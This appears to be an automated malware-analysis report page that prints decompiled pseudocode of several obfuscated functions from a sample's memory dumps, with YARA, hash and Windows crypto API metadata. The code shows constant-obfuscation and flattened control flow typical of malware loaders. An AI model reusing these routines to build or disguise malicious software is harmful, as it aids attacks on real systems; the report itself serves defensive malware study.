                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: >$$z$6:L7$N9$pEI4$pEI4
                                          • API String ID: 0-302225334
                                          • Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                          • Instruction ID: 643e34a11e3fce6f0693865e3b8b43bcac09d6585a6b33cc2ccae8c479fa81f5
                                          • Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                          • Instruction Fuzzy Hash: D96153715083419FD358CF65D88591FBBE2FBC6358F404A1EF1969A260C3B5CA4A8F87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D20C5, Relevance: 7.6, Strings: 6, Instructions: 145COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D20C5() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				void* _t124;
				short* _t127;
				void* _t132;
				void* _t134;
				intOrPtr _t150;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t167;
				void* _t169;

				_t169 = (_t167 & 0xfffffff8) - 0x250;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t132 = 0x3ec8c14;
				_v536 = 0x37230;
				_v544 = 0xcdd0;
				_v544 = _v544 >> 7;
				_v544 = _v544 ^ 0x000074a7;
				_v572 = 0xb951;
				_v572 = _v572 + 0xffffa9df;
				_v572 = _v572 ^ 0x00005eca;
				_v584 = 0x3783;
				_v584 = _v584 >> 1;
				_t159 = 0x30;
				_v584 = _v584 / _t159;
				_v584 = _v584 ^ 0x00007df0;
				_v592 = 0x764f;
				_t160 = 0x29;
				_v592 = _v592 * 0x6c;
				_v592 = _v592 + 0xffff1483;
				_v592 = _v592 ^ 0x0030effe;
				_v580 = 0x26e4;
				_v580 = _v580 + 0xffffa17d;
				_v580 = _v580 >> 0xc;
				_v580 = _v580 ^ 0x000fb6a3;
				_v588 = 0x592d;
				_v588 = _v588 * 0x5e;
				_v588 = _v588 + 0xfffff058;
				_v588 = _v588 ^ 0x0020c0b6;
				_v576 = 0x67c6;
				_v576 = _v576 >> 4;
				_v576 = _v576 | 0x70f0481f;
				_v576 = _v576 ^ 0x70f020ed;
				_v568 = 0x5c9a;
				_v568 = _v568 ^ 0x6d262440;
				_v568 = _v568 ^ 0x6d2624e4;
				_v552 = 0x512d;
				_v552 = _v552 / _t160;
				_v552 = _v552 ^ 0x00002fd7;
				_v540 = 0x67a3;
				_v540 = _v540 + 0x741c;
				_v540 = _v540 ^ 0x0000c39d;
				_v560 = 0xac4b;
				_v560 = _v560 | 0x611015d1;
				_v560 = _v560 ^ 0x6110f087;
				_v548 = 0xff97;
				_v548 = _v548 >> 8;
				_v548 = _v548 ^ 0x000016db;
				_v556 = 0xce04;
				_t161 = 0x2b;
				_v556 = _v556 / _t161;
				_v556 = _v556 ^ 0x000048b5;
				_v564 = 0x85d6;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 ^ 0x00007642;
				do {
					while(_t132 != 0x3ec8c14) {
						if(_t132 == 0x4e3e716) {
							_push(_v572);
							_t124 = E006D889D(0x6dc9b0, _v544, __eflags);
							_pop(_t134);
							_t150 =  *0x6dca2c; // 0x248300
							_t108 = _t150 + 0x230; // 0x710050
							E006CC680(_t108, _v592, _v580, _t134, _v588,  *0x6dca2c, _t124,  &_v524);
							_t169 = _t169 + 0x1c;
							_t127 = E006D2025(_v576, _t124, _v568, _v552);
							_t132 = 0x36d909ae;
							continue;
						} else {
							if(_t132 == 0x2942dba3) {
								_t127 = E006D2B16(_v548,  &_v524, E006D84CC, _v564, 0,  &_v524);
							} else {
								if(_t132 != 0x36d909ae) {
									goto L8;
								} else {
									_t127 = E006C28CE( &_v524, _v540, _v560);
									 *_t127 = 0;
									_t132 = 0x2942dba3;
									continue;
								}
							}
						}
						L11:
						return _t127;
					}
					_t132 = 0x4e3e716;
					L8:
					__eflags = _t132 - 0x16e8989b;
				} while (__eflags != 0);
				goto L11;
			}































                                          0x006d20cb
                                          0x006d20d1
                                          0x006d20d8
                                          0x006d20dd
                                          0x006d20e2
                                          0x006d20ea
                                          0x006d20f2
                                          0x006d20f7
                                          0x006d20ff
                                          0x006d2107
                                          0x006d210f
                                          0x006d2117
                                          0x006d211f
                                          0x006d212d
                                          0x006d2132
                                          0x006d2138
                                          0x006d2145
                                          0x006d215c
                                          0x006d215f
                                          0x006d2163
                                          0x006d216b
                                          0x006d2173
                                          0x006d217b
                                          0x006d2183
                                          0x006d2188
                                          0x006d2190
                                          0x006d219d
                                          0x006d21a1
                                          0x006d21a9
                                          0x006d21b1
                                          0x006d21b9
                                          0x006d21be
                                          0x006d21c6
                                          0x006d21ce
                                          0x006d21d6
                                          0x006d21de
                                          0x006d21e6
                                          0x006d21f6
                                          0x006d21fa
                                          0x006d2202
                                          0x006d220a
                                          0x006d2212
                                          0x006d221a
                                          0x006d2222
                                          0x006d222a
                                          0x006d2232
                                          0x006d223a
                                          0x006d223f
                                          0x006d2247
                                          0x006d2253
                                          0x006d2256
                                          0x006d225a
                                          0x006d2262
                                          0x006d226a
                                          0x006d226f
                                          0x006d2277
                                          0x006d2277
                                          0x006d2285
                                          0x006d22ae
                                          0x006d22bb
                                          0x006d22c0
                                          0x006d22dc
                                          0x006d22e6
                                          0x006d22ec
                                          0x006d22f1
                                          0x006d2302
                                          0x006d2309
                                          0x00000000
                                          0x006d2287
                                          0x006d2289
                                          0x006d2339
                                          0x006d228f
                                          0x006d2291
                                          0x00000000
                                          0x006d2293
                                          0x006d229f
                                          0x006d22a7
                                          0x006d22aa
                                          0x00000000
                                          0x006d22aa
                                          0x006d2291
                                          0x006d2289
                                          0x006d2341
                                          0x006d2348
                                          0x006d2348
                                          0x006d2310
                                          0x006d2312
                                          0x006d2312
                                          0x006d2312
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: -Q$-Y$Bv$Ov$$&m$&
                                          • API String ID: 0-2434786051
                                          • Opcode ID: ed0434062c272fe6a20eeeabe32c8b9785f02845526023ff46fd027a6967627f
                                          • Instruction ID: 2d8f298ec2e3d42f9a9dd74af5c567314dbdbc73743bb3a380c1f549a8d8e7b3
                                          • Opcode Fuzzy Hash: ed0434062c272fe6a20eeeabe32c8b9785f02845526023ff46fd027a6967627f
                                          • Instruction Fuzzy Hash: E35189715083419FD368DF21C88A91BBBF2FBD4328F505A1EF585462A0C7B58949CF87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100021F0, Relevance: 7.6, APIs: 5, Instructions: 67encryptionmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                          • CoTaskMemAlloc.OLE32(?), ref: 10002227
                                          • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                          • StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                          • CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: BinaryCryptStringTask$AllocDeserializeFreePropVariant
                                          • String ID:
                                          • API String ID: 2967290590-0
                                          • Opcode ID: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                          • Instruction ID: 3bbe9fb0322c03d3a19eaaaaa04faf6b757ff22615bcfcbc1accf4c01beb8128
                                          • Opcode Fuzzy Hash: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                          • Instruction Fuzzy Hash: 51116D3AA01129BBEB10DBD48C44FDE77FCDB457A1F010266FE05E2154DA719A408AA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C6754, Relevance: 6.4, Strings: 5, Instructions: 140COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E006C6754(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				unsigned int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				void* _t96;
				signed int _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t106;
				signed int _t107;
				void* _t108;
				signed int _t123;
				void* _t124;
				intOrPtr* _t128;
				signed int* _t129;

				_t129 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v532 = 0x37527f;
				_v528 = 0x4295e6;
				_v536 = 0xee22;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x00007a3a;
				_v544 = 0x8f72;
				_v544 = _v544 | 0xa1a2610a;
				_v544 = _v544 ^ 0xa1a2ad19;
				_v540 = 0xc65b;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x018ca8d5;
				_v572 = 0x4354;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff6940;
				_v572 = _v572 * 0x52;
				_t128 = __edx;
				_v572 = _v572 ^ 0xb1ecefd2;
				_v552 = 0x7a0c;
				_t104 = __ecx;
				_v552 = _v552 | 0xfffddbf7;
				_t124 = 0x1663684c;
				_v552 = _v552 ^ 0xfffd8a47;
				_v568 = 0x9348;
				_t106 = 0xf;
				_v568 = _v568 * 0x32;
				_v568 = _v568 + 0x92e3;
				_v568 = _v568 * 0x69;
				_v568 = _v568 ^ 0x0c08d7a0;
				_v556 = 0x9f50;
				_v556 = _v556 / _t106;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0x000022d0;
				_v548 = 0xa3e1;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x000031bd;
				_v564 = 0x55b6;
				_v564 = _v564 >> 1;
				_v564 = _v564 + 0xaf4f;
				_t107 = 0x5e;
				_t123 = _v548;
				_v564 = _v564 / _t107;
				_v564 = _v564 ^ 0x0000417a;
				_v560 = 0xe775;
				_v560 = _v560 << 4;
				_v560 = _v560 << 0xd;
				_v560 = _v560 ^ 0xceea6264;
				do {
					while(_t124 != 0x32e36bf) {
						if(_t124 == 0xcc4ee6e) {
							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
							_t97 =  *0x6dca24; // 0x0
							 *(_t123 + 0x2c) = _t97;
							 *0x6dca24 = _t123;
							return _t97;
						}
						if(_t124 != 0x1663684c) {
							if(_t124 == 0x2308bbf2) {
								return E006CF536(_v548, _v564, _v560, _t123);
							}
							if(_t124 != 0x242d3c72) {
								goto L12;
							} else {
								_push( &_v520);
								_t101 = E006C88E5(_t104, _t128);
								asm("sbb esi, esi");
								_t107 = 0x6dc910;
								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
								continue;
							}
							L16:
							return _t101;
						}
						_push(_t107);
						_t108 = 0x38;
						_t101 = E006C8736(_t108);
						_t123 = _t101;
						_t107 = _t107;
						if(_t123 != 0) {
							_t124 = 0x242d3c72;
							continue;
						}
						goto L16;
					}
					_push(_t107);
					_push(_v556);
					_push( &_v520);
					_push(_v568);
					_push(0);
					_push(_v552);
					_t107 = _v572;
					_push(0);
					_t96 = E006C568E(_t107, 0);
					_t129 =  &(_t129[7]);
					if(_t96 == 0) {
						_t124 = 0x2308bbf2;
						goto L12;
					} else {
						_t124 = 0xcc4ee6e;
						continue;
					}
					goto L16;
					L12:
				} while (_t124 != 0x2bbec955);
				return _t101;
			}




























                                          0x006c6754
                                          0x006c675a
                                          0x006c675f
                                          0x006c6767
                                          0x006c676f
                                          0x006c6777
                                          0x006c677c
                                          0x006c6784
                                          0x006c678c
                                          0x006c6794
                                          0x006c679c
                                          0x006c67a4
                                          0x006c67a9
                                          0x006c67b1
                                          0x006c67b8
                                          0x006c67bc
                                          0x006c67cb
                                          0x006c67cf
                                          0x006c67d1
                                          0x006c67db
                                          0x006c67e3
                                          0x006c67e5
                                          0x006c67ed
                                          0x006c67f2
                                          0x006c67fa
                                          0x006c6809
                                          0x006c680c
                                          0x006c6810
                                          0x006c681d
                                          0x006c6821
                                          0x006c6829
                                          0x006c6839
                                          0x006c683d
                                          0x006c6842
                                          0x006c684a
                                          0x006c6852
                                          0x006c6857
                                          0x006c685f
                                          0x006c6867
                                          0x006c686b
                                          0x006c6877
                                          0x006c687a
                                          0x006c687e
                                          0x006c6882
                                          0x006c688a
                                          0x006c6892
                                          0x006c6897
                                          0x006c689c
                                          0x006c68a4
                                          0x006c68a4
                                          0x006c68b2
                                          0x006c6984
                                          0x006c6987
                                          0x006c698c
                                          0x006c698f
                                          0x00000000
                                          0x006c698f
                                          0x006c68be
                                          0x006c68c6
                                          0x00000000
                                          0x006c6981
                                          0x006c68d2
                                          0x00000000
                                          0x006c68d8
                                          0x006c68de
                                          0x006c68e6
                                          0x006c68f0
                                          0x006c68f8
                                          0x006c68f9
                                          0x00000000
                                          0x006c68f9
                                          0x006c699f
                                          0x006c699f
                                          0x006c699f
                                          0x006c690d
                                          0x006c6911
                                          0x006c6912
                                          0x006c6917
                                          0x006c691a
                                          0x006c691d
                                          0x006c691f
                                          0x00000000
                                          0x006c691f
                                          0x00000000
                                          0x006c691d
                                          0x006c6929
                                          0x006c692a
                                          0x006c6934
                                          0x006c6935
                                          0x006c6939
                                          0x006c693b
                                          0x006c693f
                                          0x006c6943
                                          0x006c6945
                                          0x006c694a
                                          0x006c694f
                                          0x006c695b
                                          0x00000000
                                          0x006c6951
                                          0x006c6951
                                          0x00000000
                                          0x006c6951
                                          0x00000000
                                          0x006c6960
                                          0x006c6960
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: :z$r<-$$r<-$$u$zA
                                          • API String ID: 0-4189644680
                                          • Opcode ID: 32e583c5a317fbc1aee2bb86e34ba3dcca7b639e5a7f033bb56dc5a1f8d4b376
                                          • Instruction ID: 77a798d94479085277e98ea994d3281d3297b89260d2564226bea1c5ac131ddf
                                          • Opcode Fuzzy Hash: 32e583c5a317fbc1aee2bb86e34ba3dcca7b639e5a7f033bb56dc5a1f8d4b376
                                          • Instruction Fuzzy Hash: A0518A715083029FD318CF26C449A2BBBE1EBC8758F044A1DF4D9A72A0D7749A09CF86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C839D, Relevance: 6.4, Strings: 5, Instructions: 140COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E006C839D(void* __ecx, void* __edi) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				int _t181;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t194;
				void* _t211;
				void* _t215;
				signed int _t217;

				_v28 = 0x5ca2;
				_v28 = _v28 + 0x82ee;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x06fc8008;
				_v52 = 0x31f1;
				_v52 = _v52 * 0x4e;
				_t215 = __ecx;
				_t186 = 0x39;
				_v52 = _v52 * 0x4d;
				_v52 = _v52 >> 7;
				_v52 = _v52 ^ 0x00092748;
				_v20 = 0x7fc5;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x00d59d54;
				_v44 = 0xb39b;
				_v44 = _v44 + 0xf7d;
				_v44 = _v44 | 0x2a7b5142;
				_v44 = _v44 + 0xffff17c4;
				_v44 = _v44 ^ 0x2a7aeb0e;
				_v60 = 0x1587;
				_v60 = _v60 | 0x5979cfaa;
				_v60 = _v60 ^ 0xb2ac8491;
				_v60 = _v60 ^ 0x62b96002;
				_v60 = _v60 ^ 0x896c4508;
				_v16 = 0x3e7;
				_v16 = _v16 | 0x10c95731;
				_v16 = _v16 ^ 0x10c93485;
				_v56 = 0x1ea8;
				_v56 = _v56 << 4;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t186;
				_v56 = _v56 ^ 0x0002353c;
				_v12 = 0x5bc0;
				_t187 = 0x13;
				_v12 = _v12 / _t187;
				_v12 = _v12 ^ 0x00001b6c;
				_v48 = 0x8f53;
				_v48 = _v48 ^ 0x72e3c217;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x701cd0a1;
				_v48 = _v48 ^ 0x7012c214;
				_v24 = 0xa180;
				_v24 = _v24 | 0x7584ea2b;
				_v24 = _v24 + 0x36fb;
				_v24 = _v24 ^ 0x75854120;
				_v32 = 0x424b;
				_v32 = _v32 ^ 0x8f16dfbf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 + 0xffffa50c;
				_v32 = _v32 ^ 0x69defe02;
				_v8 = 0x6622;
				_t188 = 0x62;
				_v8 = _v8 / _t188;
				_v8 = _v8 ^ 0x00007651;
				_v36 = 0x9705;
				_t189 = 0x5a;
				_v36 = _v36 * 0x11;
				_v36 = _v36 / _t189;
				_v36 = _v36 | 0xcd876993;
				_v36 = _v36 ^ 0xcd872ff9;
				_v40 = 0x44cf;
				_v40 = _v40 | 0x3f74ab7e;
				_v40 = _v40 << 1;
				_v40 = _v40 + 0x396f;
				_v40 = _v40 ^ 0x7eea1d0a;
				_v4 = E006D8C8F(_t189);
				_t217 = _v28 + E006D8C8F(_t189) % _v52;
				_t184 = _v20 + E006D8C8F(_v52) % _v44;
				if(_t217 != 0) {
					_t211 = _t215;
					_t194 = _t217 >> 1;
					_t215 = _t215 + _t217 * 2;
					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
					asm("adc ecx, ecx");
					memset(_t211 + _t194, _t181, 0);
				}
				E006CD6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
				 *((short*)(_t215 + _t184 * 2)) = 0;
				return 0;
			}




























                                          0x006c83a0
                                          0x006c83aa
                                          0x006c83b2
                                          0x006c83b7
                                          0x006c83bf
                                          0x006c83d1
                                          0x006c83d5
                                          0x006c83dc
                                          0x006c83df
                                          0x006c83e3
                                          0x006c83e8
                                          0x006c83f0
                                          0x006c83fd
                                          0x006c8401
                                          0x006c8406
                                          0x006c840e
                                          0x006c8416
                                          0x006c841e
                                          0x006c8426
                                          0x006c842e
                                          0x006c8436
                                          0x006c843e
                                          0x006c8446
                                          0x006c844e
                                          0x006c8456
                                          0x006c845e
                                          0x006c8466
                                          0x006c846e
                                          0x006c8476
                                          0x006c847e
                                          0x006c8483
                                          0x006c8490
                                          0x006c8494
                                          0x006c849c
                                          0x006c84a8
                                          0x006c84ad
                                          0x006c84b3
                                          0x006c84bb
                                          0x006c84c3
                                          0x006c84cb
                                          0x006c84d0
                                          0x006c84d8
                                          0x006c84e0
                                          0x006c84e8
                                          0x006c84f0
                                          0x006c84f8
                                          0x006c8500
                                          0x006c8508
                                          0x006c8510
                                          0x006c8515
                                          0x006c851d
                                          0x006c8525
                                          0x006c8531
                                          0x006c8536
                                          0x006c853c
                                          0x006c8544
                                          0x006c8551
                                          0x006c8552
                                          0x006c855c
                                          0x006c8560
                                          0x006c8568
                                          0x006c8570
                                          0x006c8578
                                          0x006c8580
                                          0x006c8584
                                          0x006c858c
                                          0x006c85a1
                                          0x006c85c2
                                          0x006c85d9
                                          0x006c85dd
                                          0x006c85e2
                                          0x006c85e4
                                          0x006c85e6
                                          0x006c85ee
                                          0x006c85f0
                                          0x006c85f2
                                          0x006c85f5
                                          0x006c860f
                                          0x006c8619
                                          0x006c8623

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: BQ{*$H'$KB$Qv$o9
                                          • API String ID: 0-3657823386
                                          • Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
                                          • Instruction ID: cd6ea57da9794710d02a4a6eb7a53f8c764d8c6721ebde7b852f90b9a738d577
                                          • Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
                                          • Instruction Fuzzy Hash: A36102715093419FD388CF25D58A50BBBE1FBC8748F408A1DF1DA96260D7B9DA098F8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C5B79, Relevance: 5.2, Strings: 4, Instructions: 219COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006C5B79(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _t203;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t216;
				intOrPtr _t220;
				intOrPtr _t224;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;

				_t215 = __ecx;
				_t253 =  &_v116;
				_v20 = __edx;
				_v32 = __ecx;
				_v12 = 0xafae1;
				_v4 = 0;
				_v8 = 0x46e7c7;
				_v100 = 0x4e85;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0xa122;
				_v100 = _v100 ^ 0x0000ef7f;
				_v76 = 0x276c;
				_v76 = _v76 + 0xa4ad;
				_v76 = _v76 ^ 0x0000a5d4;
				_v116 = 0xc292;
				_v36 = 0;
				_v116 = _v116 * 0x3d;
				_t243 = 0x5ac7f3d;
				_v116 = _v116 << 0xc;
				_t246 = 0x1a;
				_v116 = _v116 / _t246;
				_v116 = _v116 ^ 0x08d6c610;
				_v96 = 0x57a;
				_v96 = _v96 << 4;
				_v96 = _v96 + 0xde71;
				_v96 = _v96 ^ 0x000109c0;
				_v108 = 0xf9e9;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 + 0xffffa4d5;
				_t247 = 0x1e;
				_v108 = _v108 * 0x3c;
				_v108 = _v108 ^ 0xffeac835;
				_v112 = 0x3502;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 + 0xffffe509;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x0003f015;
				_v64 = 0x4162;
				_v64 = _v64 + 0xffff06ec;
				_v64 = _v64 ^ 0xffff0d41;
				_v68 = 0x29f6;
				_v68 = _v68 | 0xa40114db;
				_v68 = _v68 ^ 0xa4015458;
				_v72 = 0x8ebc;
				_v72 = _v72 | 0xb773f5bd;
				_v72 = _v72 ^ 0xb773df20;
				_v52 = 0x199c;
				_v52 = _v52 + 0x59c9;
				_v52 = _v52 ^ 0x00005d96;
				_v56 = 0x9de2;
				_v56 = _v56 | 0x18b104fc;
				_v56 = _v56 ^ 0x18b18c09;
				_v60 = 0xcf04;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0000237a;
				_v92 = 0x847f;
				_v92 = _v92 / _t247;
				_v92 = _v92 + 0xfffff45a;
				_v92 = _v92 ^ 0xffffeb4a;
				_v104 = 0x72c3;
				_v104 = _v104 * 0x70;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 + 0xffffb2c0;
				_v104 = _v104 ^ 0xffff9126;
				_v48 = 0x26a;
				_t248 = 0x5f;
				_v48 = _v48 / _t248;
				_v48 = _v48 ^ 0x00002d62;
				_v88 = 0x3bd5;
				_v88 = _v88 | 0xeefd350a;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x777ec4bd;
				_v44 = 0x124c;
				_v44 = _v44 + 0xffff1b1d;
				_v44 = _v44 ^ 0xffff4aeb;
				_v80 = 0x5ade;
				_t249 = 0x3c;
				_t252 = _v20;
				_t214 = _v20;
				_v80 = _v80 * 0x3a;
				_v80 = _v80 + 0xffff943f;
				_v80 = _v80 ^ 0x0014640e;
				_v84 = 0x6f1d;
				_t250 = _v16;
				_v84 = _v84 / _t249;
				_v84 = _v84 * 0x74;
				_v84 = _v84 ^ 0x0000fa63;
				_t199 = _v40;
				while(_t243 != 0x5ac7f3d) {
					if(_t243 == 0x17993a65) {
						_t216 = E006D023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
						_t253 =  &(_t253[5]);
						_v36 = _t216;
						if(_t216 == 0) {
							_t244 = _v36;
							goto L19;
						} else {
							_t220 = _v28;
							if(_t220 == 0) {
								goto L15;
							} else {
								_t199 = _v40 + _t220;
								_v40 = _v40 + _t220;
								_t252 = _t252 - _t220;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t224 = _t250 + _t250;
									_push(_t224);
									_push(_t224);
									_v24 = _t224;
									_t245 = E006C8736(_t224);
									if(_t245 == 0) {
										goto L15;
									} else {
										E006D2674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
										E006CF536(_v104, _v48, _v88, _t214);
										_t252 = _t250;
										_t199 = _t245 + _t250;
										_t250 = _v24;
										_t253 =  &(_t253[7]);
										_v40 = _t199;
										_t214 = _t245;
										if(_t252 == 0) {
											goto L15;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t243 != 0x1ebe7f62) {
							L14:
							if(_t243 != 0x20fb0f57) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t215);
							_push(_t215);
							_t199 = E006C8736(0x10000);
							_t214 = _t199;
							if(_t214 == 0) {
								L15:
								_t244 = _v36;
								if(_t244 == 0) {
									L19:
									E006CF536(_v44, _v80, _v84, _t214);
								} else {
									_t203 = _v20;
									 *_t203 = _t214;
									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
								}
							} else {
								_v40 = _t199;
								_t252 = 0x10000;
								L6:
								_t215 = _v32;
								_t243 = 0x17993a65;
								continue;
							}
						}
					}
					return _t244;
				}
				_t243 = 0x1ebe7f62;
				goto L14;
			}
















































                                          0x006c5b79
                                          0x006c5b79
                                          0x006c5b80
                                          0x006c5b84
                                          0x006c5b88
                                          0x006c5b92
                                          0x006c5b99
                                          0x006c5ba1
                                          0x006c5ba9
                                          0x006c5bae
                                          0x006c5bb6
                                          0x006c5bbe
                                          0x006c5bc6
                                          0x006c5bce
                                          0x006c5bd6
                                          0x006c5bde
                                          0x006c5be7
                                          0x006c5beb
                                          0x006c5bf0
                                          0x006c5bfd
                                          0x006c5c02
                                          0x006c5c08
                                          0x006c5c10
                                          0x006c5c18
                                          0x006c5c1d
                                          0x006c5c25
                                          0x006c5c2d
                                          0x006c5c35
                                          0x006c5c3a
                                          0x006c5c47
                                          0x006c5c48
                                          0x006c5c4c
                                          0x006c5c54
                                          0x006c5c5c
                                          0x006c5c61
                                          0x006c5c69
                                          0x006c5c6e
                                          0x006c5c76
                                          0x006c5c7e
                                          0x006c5c86
                                          0x006c5c8e
                                          0x006c5c96
                                          0x006c5c9e
                                          0x006c5ca6
                                          0x006c5cae
                                          0x006c5cb6
                                          0x006c5cbe
                                          0x006c5cc6
                                          0x006c5cce
                                          0x006c5cd6
                                          0x006c5cde
                                          0x006c5ce6
                                          0x006c5cee
                                          0x006c5cf6
                                          0x006c5cfb
                                          0x006c5d03
                                          0x006c5d11
                                          0x006c5d15
                                          0x006c5d1d
                                          0x006c5d25
                                          0x006c5d32
                                          0x006c5d36
                                          0x006c5d3b
                                          0x006c5d43
                                          0x006c5d4d
                                          0x006c5d5b
                                          0x006c5d60
                                          0x006c5d66
                                          0x006c5d6e
                                          0x006c5d76
                                          0x006c5d7e
                                          0x006c5d82
                                          0x006c5d8a
                                          0x006c5d92
                                          0x006c5d9a
                                          0x006c5da2
                                          0x006c5daf
                                          0x006c5db0
                                          0x006c5db4
